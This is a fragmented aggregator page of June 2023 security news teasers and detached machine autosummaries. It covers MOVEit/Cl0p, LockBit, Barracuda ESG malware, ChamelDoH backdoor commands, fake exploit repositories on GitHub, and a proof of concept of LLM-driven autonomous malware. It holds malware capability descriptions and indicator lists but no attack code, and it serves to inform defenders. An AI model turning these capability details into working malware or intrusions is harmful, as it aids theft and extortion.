ESET’s unified cybersecurity platform, ESET PROTECT, is a single-pane-of-glass console – available via the cloud and on prem – that provides centralized visibility, management, and insight. The comprehensive offering combines multilayered endpoint protection with multi-factor authentication, server security, advanced threat defense, full disk encryption, mail security and cloud application protection. "Progress Software has asked customers to update their MOVEit Transfer installations again, to fix a third SQL injection vulnerability (CVE-2023-35708) discovered in the web application in less that a month. Previously, the Cl0p cyber extortion gang exploited CVE-2023-34362 to grab enterprise data, and Huntress researchers discovered CVE-2023-35036 after partnering with Progress to perform a code review of the web app. About CVE-2023-35708 CVE-2023-35708 is a vulnerability that could lead to escalated privileges and unauthorized access. … More
The post A third MOVEit vulnerability fixed, Cl0p lists victim organizations (CVE-2023-35708) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
For example, improperly configured firewall rules, open ports, or lack of network segmentation can lead to unauthorized access, network attacks, or data exfiltration. Common types of misconfigurations Common misconfigurations include weak access controls, improperly exposed ports, insecure network configurations, or mismanaged encryption settings.Secrets, such as API keys, database passwords, or encryption keys, are sensitive pieces of information that should never be exposed or shared inadvertently. "The European Commission urges member states to limit “without delay” equipment from Chinese suppliers from their 5G networks, specifically Huawei and ZTE. The European Commission told member states to impose restrictions on high-risk suppliers for 5G networks without delay, with a specific focus on the dependency on high-risk suppliers, specifically Chinese firms Huawei and ZTE. […]
The post EU member states are urged to restrict without delay 5G equipment from risky suppliers appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, European Commission) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" While a fix is yet to be released by Cisco and WatchGuard, affected customers are advised to toggle off anti-exploit protection or set Chrome as the default web browser from Settings > Select Default Browser to revive the web browser on impacted Windows 11 systems. "Autosummary:
OnlyFans is a content subscription service where paid subscribers can access private photos, videos, and posts from adult models, celebrities, and social media personalities. "Autosummary:
First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "Autosummary:
Various other Iowa school districts, such as the Cedar Rapids Community School District, the Davenport Community School District, and the Linn-Mar Community School District, have also been hit by ransomware last year, according to a Des Moines Register report. "Categories: News Categories: Ransomware Tags: Cl0p Tags: ransomware Tags: RFJ Tags: 10 million Tags: MOVEit Rewards for Justice (RFJ) is offering a reward of up to $10 million for information the Cl0p ransomware gang is acting at the direction or under the control of a foreign government. |
The post US dangles $10 million reward for information about Cl0p ransomware gang appeared first on Malwarebytes Labs.
"Autosummary:
The US Department of State’s national security rewards program, Rewards for Justice (RFJ), is offering a reward of up to $10 million for information linking the Cl0p ransomware gang, or any other malicious cyber actors targeting US critical infrastructure, to a foreign government.RFJ’s statutory authorities offers rewards for information in four broad categories and one of them is: Malicious Cyber Activity For information that identifies or locates any individual who, while acting at the direction or under the control of a foreign government, aids or abets a violation of the Computer Fraud and Abuse Act (“CFAA”), 18 U.S.C. § 1030. "Categories: Business Tags: door dash Tags: delivery Tags: phish Tags: phishing Tags: scam Tags: fake Tags: fraud Tags: theft Tags: call Tags: support Tags: phone We take a look at a phishing scam that cost 700 DoorDash drivers a combined total of roughly $950k. |
The post Phishing scam takes $950k from DoorDash drivers appeared first on Malwarebytes Labs.
"Autosummary:
Phishing attacks often seem to come from brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often seem to come from brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.If you fall for a phish, make your data useless: If you entered a password, change it, if you entered credit card details, change the card. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Building a culture of security awareness in healthcare begins with leadership In this Help Net Security interview, Ken Briggs, General Counsel at Salucro, discusses how fostering a culture of security awareness has become paramount for healthcare organizations. Building a hyper-connected future with 6G networks In this Help Net Security interview, Shamik Mishra, Capgemini‘s CTO of Connectivity, delves into the emerging … More
The post Week in review: Fortinet patches pre-auth RCE, Switzerland under cyberattack appeared first on Help Net Security.
"Autosummary:
Building a hyper-connected future with 6G networks In this Help Net Security interview, Shamik Mishra, Capgemini‘s CTO of Connectivity, delves into the emerging themes and technologies shaping 6G, its performance metrics compared to 5G, the role of advanced AI algorithms, the impact of higher frequencies, and the geopolitical race for 6G leadership. New infosec products of the week: June 16, 2023 Here’s a look at the most interesting products from the past week, featuring releases from NETSCOUT, Okta, Quantinuum, Seceon, and Zilla Security. "The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government. The US goverment is offering up to a $10 million bounty for information linking CL0P Ransomware Gang or any other threat actors targeting U.S. critical infrastructure to a foreign government. The bounty is covered […]
The post US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government. appeared first on Security Affairs.
"Autosummary:
“ Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Clop ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnYou could be eligible for a reward.#StopRansomware pic.twitter.com/fAAeBXgcWA — Rewards for Justice (@RFJ_USA) June 16, 2023 The U.S. State Department’s Rewards for Justice (RFJ) program is a government counterterrorism rewards program that offers monetary rewards for information leading to the prevention, disruption, or conviction of individuals involved in acts against U.S. interests. "Autosummary:
"Autosummary:
"After successfully obtaining a single employee"s credentials, the attacker gained access to some internal docs, code, as well as some internal dashboards and business systems," explained a post by Reddit CTO Christopher Slowe, aka KeyserSosa. "Autosummary:
Notable entries in the list include: Google Chrome Mozilla Firefox Microsoft Edge Opera Vivaldi Brave-Browser Binance Exodus Bitcoin Litecoin Electrum Authy 2FA Gauth Authenticator EOS Authenticator LastPass: Free Password Manager Trezor Password Manager RoboForm Password Manager Dashlane — Password Manager NordPass Password Manager & Digital Vault Browserpass MYKI Password Manager & Authenticator "The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents, code, and some business systems. The company announced it was hit by a sophisticated and highly-targeted attack that took […]
The post Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit appeared first on Security Affairs.
"Autosummary:
BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
History - A shell script that"s designed to run Update The SSH brute-forcer tool (aka aliases), for its part, parses the text file output of Chrome to break into each of the identified IP addresses, and if successful, establishes remote connection to the IP address. "Autosummary:
Initially launched to gather information on terrorists targeting U.S. interests, the program has since expanded to include information on cyber criminals, such as the Conti ransomware operation, Russian Sandworm hackers, REvil ransomware, and the Evil Corp hacking group. "After two years of pandemic-induced disruption, 2022 was a return to business as usual for the world’s cybercriminals, according to Proofpoint. As COVID-19 medical and economic programs began to wind down, attackers had to find new ways to make a living by honing their social engineering skills, commoditising once-sophisticated attack techniques, and creatively searching for new opportunities in unexpected places. Creativity among threat actors From scaling brute-force and targeted attacks on cloud tenants to the … More
The post Cybercriminals return to business as usual in a post-pandemic world appeared first on Help Net Security.
"Autosummary:
“With Microsoft 365 forming a large percentage of the typical organization’s attack surface, broad abuse of that platform, from Office macros to OneNote documents, continues to shape the broad outlines of the threat landscape,” said Ryan Kalember, EVP, cybersecurity strategy, Proofpoint. "Despite a hardening economic climate, heightened global tensions and the onset of new technology making cybercrime easier, 76% of the CISOs, suggested that no material breaches had occurred and 60% said that no material cybersecurity incident had occurred in the past 12 months, according to ClubCISO and Telstra Purple. This apparent success of security teams is particularly interesting given that CISOs on average rated their organization’s overall security posture lower than they did over the … More
The post Cybersecurity culture improves despite the dark clouds of the past year appeared first on Help Net Security.
"Autosummary:
Digging into the cultural improvements in more detail, proactive ‘report it’ no-blame policies (41%), simulated phishing (38%) and tailored training (37%) remain as the other key drivers of security culture. "Autosummary:
"Autosummary:
Join the Session The DoJ statement also comes a day after cybersecurity authorities from Australia, Canada, France, Germany, New Zealand, the U.K., and the U.S. released a joint advisory warning of LockBit ransomware. "Autosummary:
E-commerce security improvements – Since 2021, e-commerce sites have been using more robust security measures, such as two-factor authentication (2FA), address verification systems, and secure payment systems adhering to PCI DSS, making it harder for cybercriminal threat actors to steal credit card data from consumers.The significant decline in credit card fraud is due mainly to the following: Improvements in authentication and fraud prevention – Banks and financial institutions are using advanced authentication and "passwordless" methods that make it harder to compromise a card, such as biometric authentication (e.g., fingerprints and face recognition), as well as PINs, EMV chips, and multi-factor authentication (MFA).As cryptocurrency has gained broader adoption for legitimate purposes, it"s also become a target for threat actors, presenting new opportunities for "crypto-jacking," digital wallet takeovers, crypto-mining, and siphoning digital assets from crypto exchanges. "Autosummary:
"Autosummary:
The OMV says that those impacted likely had the following personal information exposed: Name Address Social Security Number Birth date Height Eye Color Driver"s License Number Vehicle Registration Information Handicap Placard Information However, the agency says there is no indication that Clop used, sold, shared, or released any of that data, so the stolen data may have been deleted as the ransomware actors promised in their announcement to delete any stolen government data. "British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign conducted by the Clop gang exploiting a MOVEit zero-day vulnerability Threat actors are actively exploiting the zero-day vulnerability, tracked […]
The post Oil and gas giant Shell is another victim of Clop ransomware attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @DanielGallagher, @malwrhunterteam, @BleepinComputer, @VK_Intel, @LawrenceAbrams, @PolarToffee, @struppigel, @jorntvdw, @Ionut_Ilascu, @FourOctets, @serghei, @fwosar, @Seifreed, @malwareforme, @demonslay335, @AuCyble, @pcrisk, @FortiGuardLabs, @1ZRR4H, @SentinelOne, @SttyK, @juanbrodersen, @AShukuhi, @BrettCallow, @Jon__DiMaggio, and @snlyngaas. "Categories: Exploits and vulnerabilities Categories: News Categories: Ransomware Tags: Progress Tags: Moveit Tags: CVE-2023-34362 Tags: CVE-2023-35036 Tags: Cl0p Progress has released an advisory about yet another MOVEit Transfer vulnerability while new victims of the first one keep emerging. |
The post MOVEit discloses THIRD critical vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Victims have been identified in the UK, US, Germany, Austria, Switzerland, Luxembourg, France, and the Netherlands.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Among the probably hundreds of victims are Payroll provider Zellis who serves British Airways and the BBC, oil giant Shell, several financial services organizations, insurance companies, and many others. "Categories: News Tags: GitHub Tags: malware Tags: repository Tags: security researcher Tags: fake Tags: download Tags: scam Tags: twitter Tags: social We take a look at reports of fake security researchers offering up malware downloads via GitHub repositories. |
The post Fake security researchers push malware files on GitHub appeared first on Malwarebytes Labs.
"Autosummary:
GitHub Accounts github.com/AKuzmanHSCS github.com/RShahHSCS github.com/BAdithyaHSCS github.com/DLandonHSCS github.com/MHadzicHSCS github.com/GSandersonHSCS github.com/SSankkarHSCS Malicious Repositories github.com/AKuzmanHSCS/Microsoft-Exchange-RCE github.com/MHadzicHSCS/Chrome-0-day github.com/GSandersonHSCS/discord-0-day-fix github.com/BAdithyaHSCS/Exchange-0-Day github.com/RShahHSCS/Discord-0-Day-Exploit github.com/DLandonHSCS/Discord-RCE github.com/SSankkarHSCS/Chromium-0-Day If any of the above look familiar, and if you recognise any of the usernames from their matching Twitter accounts, it may well be time to run some security scans on your PC. The GitHub pages also leaned into social aspects, making use of popular tags like “discordapp”, “cve”, and “rce-exploits” to draw more potential victims in to look at the rogue pages. "DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous LockBit ransomware attacks against systems in the United States, Asia, Europe, and Africa. The US authorities arrested the man […]
The post A Russian national charged for committing LockBit Ransomware attacks appeared first on Security Affairs.
"Autosummary:
The operation targeted many organizations in critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. In May, the US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks. "Autosummary:
"In this Help Net Security video, Jim Simpson, Director of Threat Intelligence at Searchlight Cyber, discusses how cybercriminals employ specialized strategies when targeting energy companies. This is primarily due to the sensitive and valuable information these organizations hold and their critical role in infrastructure, making them particularly attractive for economic and geopolitical disruption. Energy companies are routinely discussed on dark web forums, with threat actors frequently auctioning initial access via remote software, VPNs, and stolen … More
The post How cybercriminals target energy companies appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The state-sponsored actor, per Microsoft, has a track record of orchestrating destructive attacks, espionage, and information operations aimed at entities located in Ukraine, Europe, Central Asia, and, periodically, Latin America. "Autosummary:
That"s according to a joint bulletin published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and other partner authorities from Australia, Canada, France, Germany, New Zealand, and the U.K. "The LockBit ransomware-as-a-service (RaaS) attracts affiliates to use LockBit for conducting ransomware attacks, resulting in a large web of unconnected threat actors conducting wildly varying attacks," the agencies said. "The LockBit ransomware group successfully extorted roughly $91 million from approximately 1,700 U.S. organizations since 2020. According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted roughly $91 million in about 1,700 attacks against U.S. organizations since 2020. The advisory was published by Cybersecurity and Infrastructure Security Agency (CISA), […]
The post Cybersecurity agencies published a joint LockBit ransomware advisory appeared first on Security Affairs.
"Autosummary:
The advisory was published by Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international agencies: Australian Cyber Security Centre (ACSC) Canadian Centre for Cyber Security (CCCS) United Kingdom’s National Cyber Security Centre (NCSC-UK) National Cybersecurity Agency of France (ANSSI) "Autosummary:
GravityRAT, like most Android backdoors, requests for intrusive permissions under the garb of a seemingly legitimate app to harvest sensitive information such as contacts, SMSes, call logs, files, location data, and audio recordings without the victim"s knowledge. "Autosummary:
"Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrates the stolen data to the hijacked bucket," Checkmarx researcher Guy Nachshon said. "Autosummary:
Additionally, media and document files of jpg, jpeg, log, png, PNG, JPG, JPEG, txt, pdf, xml, doc, xls, xlsx, ppt, pptx, docx, opus, crypt14, crypt12, crypt13, crypt18, and crypt32 types, are also stolen. "Autosummary:
"Autosummary:
" Vulnerable Barracuda code Source: Mandiant Once the threat actors gained remote access to the Barracuda ESG device, they infected it with malware families known as "Saltwater," "Seaspy," and "Seaside" to steal email data from the devices. The Seaspy attack diagram (Mandiant) Finally, there"s "Sandbar," which the threat actors used for hiding Linux server processes whose name starts with "Bar," which cloaks the activities of Seaspy in particular, allowing it to operate undetected. "Autosummary:
The LNKs created by the script take a broad range of names, some selected specifically to pique the victim"s interest like: weapons_list.rtf.lnk secret.rtf.lnk pornophoto.rtf.lnk my_photos.rtf.lnk login_password.docx.lnk compromising_evidence.rtf.lnk instructions.rtf.lnk account_card.rtf.lnk bank_accоunt.rtf.lnk Once the victim launches those files, the PowerShell script enumerates all drives on the computer and copies itself to removable USB disks, increasing the likelihood of successful lateral movement within the breached network. "Autosummary:
In May 2023, Mikhail Pavlovich Matveev (also known as Wazawaka, m1x, Boriselcin, and Uhodiransomwar) was also charged for his alleged involvement in deploying LockBit, Babuk, and Hive ransomware in attacks targeting organizations within and outside the United States. "Autosummary:
"Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis said in a report shared with The Hacker News. "Autosummary:
Also deployed by the adversary is a kernel rootkit named SANDBAR that"s configured to conceal processes that begin with a specified name as well as trojanized versions of two different valid Barracuda Lua modules - SEASPRAY - A launcher for screening incoming email attachments with a particular filename and runs an external C-based utility dubbed WHIRLPOOL to create a TLS reverse shell - A launcher for screening incoming email attachments with a particular filename and runs an external C-based utility dubbed WHIRLPOOL to create a TLS reverse shell SKIPJACK - A passive implant that listens for incoming email headers and subjects and executes the content present in "Content-ID" header field Source code overlaps have been identified between SEASPY and a publicly available backdoor referred to as cd00r and also between SANDBAR and an open-source rootkit, suggesting that the actor repurposed existing tools to orchestrate the intrusions. "Autosummary:
Join the Session "By using VPN infrastructure, which in at least part was also utilized by numerous other benign users, it is apparent that the Vidar threat actors may be taking steps to anonymize their management activities by hiding in general Internet noise," Team Cymru noted. "Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China. Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day vulnerability to China. “Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset […]
The post Barracuda ESG zero-day exploited by China-linked APT appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Barracuda ESG) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors.” On May 30, 2023, the vendor provided a Preliminary Summary of Key Findings related to its investigation that includes a timeline of events, Indicators of Compromise (IOCs), and recommended actions for impacted customers. "Autosummary:
"Autosummary:
Chilean Army entry on Rhysida"s leak site (BleepingComputer) The Rhysida ransomware gang describes itself as a "cybersecurity team" that aims to help victims secure their networks, and it was first spotted by MalwareHunterTeam on May 17, 2023. "Categories: News Categories: Ransomware Tags: CISA Tags: LockBit Tags: stats Tags: RaaS A joint advisory published by CISA, the FBI and many others shows some interesting stats that align with data found by Malwarebytes. |
The post LockBit ransomware advisory from CISA provides interesting insights appeared first on Malwarebytes Labs.
"Autosummary:
The US Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing and Analysis Center (MS-ISAC), and the cybersecurity authorities of Australia, Canada, United Kingdom, Germany, France, and New Zealand (CERT NZ, NCSC-NZ) have all published a joint Cybersecurity Advisory about LockBit. To help organizations understand and defend against this global threat and its large number of unconnected LockBit affiliates, the advisory titled Understanding Ransomware Threat Actors: LockBit includes: A list of approximately 30 freeware and open-source tools used by LockBit actors Over 40 of their TTPs mapped to MITRE ATT&CK Observed common vulnerabilities and exposures (CVEs) used for exploitation An evolution of LockBit RaaS (Ransomware as a Service) along with worldwide trends and statistics Resources and services available from authoring agencies and recommended mitigations to help protect against the worldwide LockBit activity The advisory points out that in 2022, LockBit was the most active global ransomware group and RaaS provider in terms of the number of victims claimed on its data leak site.In the US, however, the main target of almost every commercial ransomware group, LockBit is responsible for 16% of attacks on public entities, which include municipal and county governments, public higher education and K-12 schools, as well as vital services like law enforcement agencies. "Autosummary:
"61% of SMBs have been hit by a successful cyberattack in the last year, according to BlackFog. The research study, which examined the business impact of cybersecurity for organizations in the US and UK, also revealed the growing importance of engaging with trusted partners to meet their security challenges. Businesses are also falling victim to repeat attacks, with 87% of IT decision makers stating they had experienced two or more successful attacks in the past … More
The post IT providers become go-to for cybersecurity advice appeared first on Help Net Security.
"Autosummary:
In fact, 26% rated providers and partners as the most highly trusted compared with colleagues in their company (21%), analysts (16%) and peers within other organizations (10%). "Autosummary:
"Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats. Executive Summary In this report we shared some insight that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating how a potential new kind of […]
The post LLM meets Malware: Starting the Era of Autonomous Threat appeared first on Security Affairs.
"Autosummary:
Researchers in the industry have just scratched the surface of this application, for instance with read teaming application, as in the case of the PentestGPT project, but also, more recently even with malware related applications, in fact, Juniper researchers were using ChatGPT to generate malicious code to demonstrate the speedup in malware writing, and CyberArk’s ones tried to use ChatGPT to realize a polymorphic malware, along with Hays researchers which created another polymorphic AI-powered malware in Python. About the author: B42 Labs researchers Original post at https://medium.com/@b42labs/llm-meets-malware-starting-the-era-of-autonomous-threat-e8c5827ccc85 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, LLM) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Technical Analysis This is an uncommon threat research article, here the focus is not in a real-world threat actor, instead we deepen an approach that could be likely adopted in the near future by a whole new class of malicious actors, the AI-powered autonomous threat. Conclusion In conclusion, when we just look in the direction of LLMs and malware combined together, we clearly see a significant evolution in cybersecurity threats, potentially able to lead to a paradigm shift where malicious code operates based on predefined high-level intents. Luckily, the autonomous malware PoC we set up and the potential upcoming ones have still limitations: they rely on generic language models hosted online, this mean the internet connectivity is, and will be, a requirement for at least some time. As anticipated before, our Proof of Concept (PoC) autonomous malware is an AI-enabled Powershell script, designed to illustrate the potential of artificial intelligence in automation and decision-making, with each phase of execution highlighting the adaptability and intelligence of the AI. Executive Summary In this report we shared some insight that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating how a potential new kind of autonomous threats would look like in the near future. "Autosummary:
More recently, academics found thousands of repositories on GitHub offering fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them infecting users with malware, malicious PowerShell, obfuscated info-stealer downloaders, Cobalt Strike droppers, and more. "Swiss government websites are under DDoS attacks, but several ransomware gangs have also turned their sights on Swiss government organizations, cantonal governments, cities and companies in the last few months. Government sites under DDoS attacks “Several Federal Administration websites are/were inaccessible on Monday 12 June 2023, due to a DDoS attack on its systems,” the Swiss National Cyber Security Centre (NCSC) said on Monday. “The Swiss government’s portal www.admin.ch remains accessible.” But the attackers did … More
The post Switzerland under cyberattack appeared first on Help Net Security.
"Autosummary:
According to Netzwoche, some 100 customers were affected by the outage, among them the municipality of Rüegsau, cinema chain Pathé, the industrial group Insys, the tool manufacturer PB Swiss Tools, the electrical engineering company Boess, and the Rugenbräu brewery. According to Swiss news outlet Le Temps, some of the Xplain data leaked by Play includes contracts, technical specifications, identifiers to access certain services, etc., from IT projects the company carried out with the Federal Office of Police (Fedpol) and several cantonal police forces. "Autosummary:
Besides gathering system metadata, the malware possesses capabilities to harvest cookies and credentials stored in web browsers as well as files present in the Windows user profile folders, including Desktop, Documents, Downloads, Pictures, Music, Videos, and OneDrive. "Autosummary:
VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security." "Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion. A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress plugins — infiltrating over a million websites and leaving administrators scrambling for solutions. In April 2023, Bleeping […]
The post Unveiling the Balada injector: a malware epidemic in WordPress appeared first on Security Affairs.
"Autosummary:
If you want to read the summary give a look at the original post at Original post @ https://cybernews.com/security/wordpress-malware-epidemic-balada-injector/ About the author: Adam Kohnke, Contributor at Cyber News Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Balada injector) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Some advice is self-evident, like ensuring web server hosts, website plugins, themes, or related software remain current and up to date.Primarily leveraging functions written in the Go language, ‘Balada’, which translates to ‘Ballad’ in several languages, achieves initial infection through commonly known but unpatched WordPress plugins, themes, or other software vulnerabilities. "A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability. Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked as CVE-2023-20867. “VMware Tools contains an Authentication Bypass vulnerability in the vgauth module.” reads the advisory published by VMware. “A fully compromised […]
The post China-linked APT UNC3886 used VMware ESXi Zero-Day appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, UNC3886) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Stairwell researchers found that ChamelDoH supports the following commands that its operators can issue remotely via the TXT records received in DNS-over-HTTPS requests: run – Execute a file/shell command – Execute a file/shell command sleep – Set the number of seconds until the next check-in – Set the number of seconds until the next check-in wget – Download a file from a URL – Download a file from a URL upload – Read and upload a file – Read and upload a file download – Download and write a file – Download and write a file rm – Delete a file – Delete a file cp – Copy a file to a new location – Copy a file to a new location cd – Change the working directory Stairwell"s analysis showed that ChamelDoH was first uploaded to VirusTotal in December 2022. "Autosummary:
"Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. "Autosummary:
"Quantinuum launched Quantum Origin Onboard, an innovation in cryptographic key generation that provides quantum computing hardened cyber protection for a wide range of connected devices by maximizing the strength of keys generated within the devices themselves. The risk of cyberattacks compromising organizations continues to grow. As cybercriminals uncover new techniques to exploit connected systems and their data, even the cryptographic foundations of cybersecurity measures remain vulnerable to advanced threats. Cryptographic keys created using current typical … More
The post Quantum Origin Onboard strengthens device security against cyberattacks appeared first on Help Net Security.
"Autosummary:
“While quantum computing has the potential to render current encryption algorithms obsolete, posing a significant challenge to businesses and individuals alike, already today sophisticated attackers can take advantage of vulnerable encryption keys,” said Dr. Rajeeb Hazra, CEO of Quantinuum. "Rezilion released Agentless solution, allowing user connection and access to Rezlion’s full feature functionality across multiple cloud platforms. It enables security teams to monitor exploitable attack surfaces in runtime without using an agent to simultaneously minimize security and operational risk. Many reports and analyses confirm that organizations spend extraordinary time prioritizing and remediating software vulnerabilities. Research conducted by Ponemon Institute underscores that vulnerability management is time-consuming, costly, and often too overwhelming. Nearly half (47%) of … More
The post Rezilion releases agentless runtime monitoring solution for vulnerability management appeared first on Help Net Security.
"Autosummary:
While some organizations feel comfortable with agents, it represents an operational risk and overhead, leading Rezilion to release the first agentless solution that can see into the runtime execution of the software and determine not only which components are vulnerable but know if they are exploitable in the runtime context. "Autosummary:
"Autosummary:
"On June 13, 2023, Microsoft"s KB5027231 update installed on Windows 11 caused a conflict between Google Chrome and exploit protection, resulting in browser crashes," Malwarebytes said. "Autosummary:
ChromeLoader history ChromeLoader is a browser hijacker that force-installs browser extensions that redirect search results to promote unwanted software, fake giveaways, surveys, adult games, dating sites, and other irrelevant results. "Autosummary:
"Autosummary:
Malicious website spreading Crypter ransomware (BleepingComputer) The installer downloaded from the fake website is "enlisted_beta-v1.0.3.115.exe," which drops two executable files on the user"s disk if launched, namely "ENLIST~1" (the actual game) and "enlisted" (the Python ransomware launcher). "Categories: Exploits and vulnerabilities Categories: News Tags: Google Tags: Chrome Tags: Autofill Tags: payments critical Tags: CVE-2023-3214 Google has released an update which includes five security fixes including a critical vulnerability in Autofill payments. |
The post Update Chrome now! Google fixes critical vulnerability in Autofill payments appeared first on Malwarebytes Labs.
"Autosummary:
Chrome needs a relaunch to apply the update After the update, your version should be 114.0.5735.133 for Mac and Linux, and 114.0.5735.133/134 for Windows, or later. How to protect yourself If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. "Categories: Personal Tags: Taylor Tags: swift Tags: eras Tags: music Tags: gig Tags: concert Tags: tour Tags: scam Tags: ticket Tags: reseller Tags: fraud Tags: fake We take a look at multiple reports of ticket reseller fraud aimed at fans of Taylor Swift"s Era tour. |
The post Ticket scammers target Taylor Swift tour appeared first on Malwarebytes Labs.
"Autosummary:
Taylor Swift fans are being warned to be cautious when buying tickets for her current “Eras” tour, with scammers waiting in the wings to trick would-be gig goers.Reports of scammers taking advantage of Swift’s fans, called Swifties, indicate some have lost as much as $2,500 paying for tickets that don’t exist or that never arrive.His warning reads as follows: “Michigan residents who are defrauded by online ticket scammers should not just shake it off,” said Nessel. "Autosummary:
"UK communications regulator Ofcom suffered a data breach after a Clop ransomware attack exploiting the MOVEit file transfer zero-day. UK’s communications regulator Ofcom disclosed a data breach after a Clop ransomware attack. The threat actors exploited the zero-day flaw (CVE-2023-34362,) in MOVEit file transfer and access the infrastructure of the regulator. A spokesperson for Ofcom […]
The post UK communications regulator Ofcom hacked with a MOVEit file transfer zero-day appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Security firm Horizon3 released proof-of-concept (PoC) exploit code for the remote code execution (RCE) flaw CVE-2023-34362 in the MOVEit Transfer MFT. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files using SFTP, SCP, and HTTP-based uploads. The vulnerability is a SQL injection vulnerability, it can be exploited by […]
The post Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw appeared first on Security Affairs.
"Autosummary:
